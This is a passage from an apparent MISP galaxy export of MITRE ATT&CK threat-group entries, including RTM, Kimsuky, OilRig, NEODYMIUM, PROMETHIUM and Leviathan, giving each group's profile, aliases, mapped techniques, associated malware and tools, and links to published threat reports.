uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 4553. Table References
Links
https://attack.mitre.org/groups/G0084
https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

RTM - G0048

[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)

The tag is: misp-galaxy:mitre-intrusion-set="RTM - G0048"

RTM - G0048 is also known as:

View relationships graph

RTM - G0048 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RTM - S0148" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 4554. Table References
Links
https://attack.mitre.org/groups/G0048
https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

Kimsuky - G0094

[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)

[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094"

Kimsuky - G0094 is also known as:

Kimsuky
STOLEN PENCIL
Thallium
Black Banshee
Velvet Chollima

View relationships graph

Kimsuky - G0094 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KGH_SPY - S0526" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NOKKI - S0353" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="CSPY Downloader - S0527" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media - T1593.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="AppleSeed - S0622" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

Table 4555. Table References
Links
https://attack.mitre.org/groups/G0094
https://blog.alyac.co.kr/2234
https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/
https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite
https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/
https://us-cert.cisa.gov/ncas/alerts/aa20-301a
https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/
https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf
Analysis_ReportOperation%20Kabar%20Cobra.pdf[Analysis_ReportOperation%20Kabar%20Cobra.pdf]
https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/
https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/
https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/

OilRig - G0049

[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="OilRig - G0049"

OilRig - G0049 is also known as:

OilRig
COBALT GYPSY
IRN2
HELIX KITTEN
APT34

View relationships graph

OilRig - G0049 has relationships with:

similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RGDoor - S0258" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SEASHARPEE - S0185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OopsIE - S0264" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POWRUNER - S0184" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Helminth - S0170" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ISMInjector - S0189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="QUADAGENT - S0269" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BONDUPDATER - S0360" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RDAT - S0495" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SideTwist - S0610" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 4556. Table References
Links
https://attack.mitre.org/groups/G0049
http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
http://www.clearskysec.com/oilrig/
http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
https://pan-unit42.github.io/playbook_viewer/
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

NEODYMIUM - G0055

[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055"

NEODYMIUM - G0055 is also known as:

NEODYMIUM

View relationships graph

NEODYMIUM - G0055 has relationships with:

similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Wingbird - S0176" with estimative-language:likelihood-probability="almost-certain"

Table 4557. Table References
Links
https://attack.mitre.org/groups/G0055
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/
http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf
https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

PROMETHIUM - G0056

[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056"

PROMETHIUM - G0056 is also known as:

PROMETHIUM
StrongPity

View relationships graph

PROMETHIUM - G0056 has relationships with:

similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Truvasys - S0178" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="StrongPity - S0491" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1587.002" with estimative-language:likelihood-probability="almost-certain"

Table 4558. Table References
Links
https://attack.mitre.org/groups/G0056
https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/
http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf
https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

Leviathan - G0065

[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security’s (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leviathan - G0065"

Leviathan - G0065 is also known as:

Leviathan
MUDCARP
Kryptonite Panda
Gadolinium
BRONZE MOHAWK
TEMP.Jumper
APT40
TEMP.Periscope

View relationships graph

Leviathan - G0065 has relationships with:

similar: misp-galaxy:threat-actor="Leviathan" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="BITSAdmin - S0190" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HOMEFRY - S0232" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NanHaiShu - S0228" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MURKYTOP - S0233" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Orz - S0229" with estimative-language:likelihood-probability="almost-certain"
